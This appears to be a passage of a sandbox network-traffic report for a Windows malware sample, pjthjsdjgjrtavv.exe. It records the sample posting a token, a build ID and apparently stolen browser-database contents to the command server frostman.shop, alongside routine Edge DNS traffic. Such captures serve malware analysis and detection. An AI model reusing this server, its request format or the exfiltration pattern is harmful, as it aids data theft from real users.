                                                                                                                                                                                                                                                                              2024-12-20 06:31:35 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------YUAI5X4W47GV3EUS0HDTCont
2024-12-20 06:31:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49815 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:41 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----O8GDBAS0ZU37YUAS0ZM7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 3165
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:41 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------O8GDBAS0ZU37YUAS0ZM7Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------O8GDBAS0ZU37YUAS0ZM7Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------O8GDBAS0ZU37YUAS0ZM7Cont
2024-12-20 06:31:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49827 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:43 UTC | 328 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DTJEUS2DTRQQIMOZMYMO
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 207993
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------DTJEUS2DTRQQIMOZMYMOContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------DTJEUS2DTRQQIMOZMYMOContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------DTJEUS2DTRQQIMOZMYMOCont
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                              Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-20 06:31:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:44 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49829 | 162.159.61.3 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:43 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
2024-12-20 06:31:43 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:43 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                              CF-RAY: 8f4d975118ca439c-EWR
                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ef 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcomA)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49835 | 172.64.41.3 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:43 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
2024-12-20 06:31:43 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:43 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                              CF-RAY: 8f4d9751283743dd-EWR
                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0e 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcomPc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.7 | 49831 | 162.159.61.3 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:43 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
2024-12-20 06:31:43 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:43 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                              CF-RAY: 8f4d97512df419bb-EWR
                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d1 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.7 | 49850 | 162.159.61.3 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:43 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 49851 | 172.64.41.3 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:43 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 49852 | 162.159.61.3 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:43 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 49830 | 142.250.181.65 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:43 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                              Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-20 06:31:44 UTC | 570 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                              Content-Length: 154477
                                                                                                                                                                                                                                                                              X-GUploader-UploadID: AFiumC6ap6mNg0Hrw4MtMT8Ug49sMHZd2KZOx4D3WSOxG8DdznHqccDZ3EzB8t1i9o_OOP9MacNJios
                                                                                                                                                                                                                                                                              X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                                                                              Date: Thu, 19 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                              Expires: Fri, 19 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                              Age: 52410
                                                                                                                                                                                                                                                                              Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                              ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                              Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                              Connection: close
